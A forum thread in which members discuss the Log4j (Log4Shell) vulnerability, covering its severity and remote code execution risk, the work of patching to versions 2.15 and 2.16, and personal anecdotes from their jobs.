OT: Since it is popping up in the news Log4j

[Docbop]

Seen this popping up in regular news to panic people and get ratings here's a Tech news explanation of what the Log4Shell and Log4j are about. Short version, it mainly affects web servers not anything a user can do.

 

[Mighty Ferguson]

Unfortunately this has been dominating my work life since Friday. While true there's not anything a normal user can do, it's legitimately one of the worst vulnerabilities to come along in a long time due to the combination of being fairly easy to exploit, plus is a remote code vulnerability - meaning you can get a target server to run malicious code directly. It's got a vulnerability score of 10.0, the highest there is. The underlying Log4j component is present in lots of Java environments, even if it's not being used, so the impact is very wide. Web apps of all sorts are vulnerable, and so for a lot of companies it's a combination of fixing the ones coded in-house, plus waiting for the vendors for vulnerable off the shelf software to fix theirs.

[GovernorSilver]

I do feel sympathy for former colleagues who may have had to work extra hours due to log4j. I've never seen log4j used to execute code. I'm sure the smartest peeps on the past Java-focused projects I worked on were aware of that feature, but we used log4j to.... just write to log files... and Java code to do what code does... how about that? If I were still working at my last job, I probably would have had a very busy last couple of days too.

 

I now work with a team that develops software primarily with .NET C#. Coming from a Java background, I've had to deal with some learning curves, like how .NET handles logging compared to Java.

[David Emm]

This crap makes me long for my old IBM Selectric. It woke the dead while in operation, but it never crashed.

[vonnor]

My current project is upgrading to v2.15 this week due to this finding.

[Stokely]

That caused a pretty big stir over the weekend at work, various dev teams had to upgrade apps and integrations.

 

I'm over on the database side of things, the world of development has left me in the dust over the past decade and a half (and to be fair, I was always just a web application scripter anyway). All the frameworks and dependencies and ORMs...not to mention the crazy front end which was what I was primarily fleeing from "But I wanted that special color of blue!" "er...we agreed on the exact color during the last meeting..." Kill me now if I ever have to work with front-end clients again.

[mauriziodececco]

Ehm, this subject kept also my professional life busy this week (software security, or better, the lack of it, it what pay my salary every month).

 

And finally i discovered that the real threat is the Minecraft server running at home on a Mac Mini, that i manage with my 15 years old son.

 

Maurizio

[Mighty Ferguson]

My current project is upgrading to v2.15 this week due to this finding.

 

Vonnor, there's yet another new CVE (DDoS vulnerability, not as severe) for 2.15. Plan to go straight to 2.16.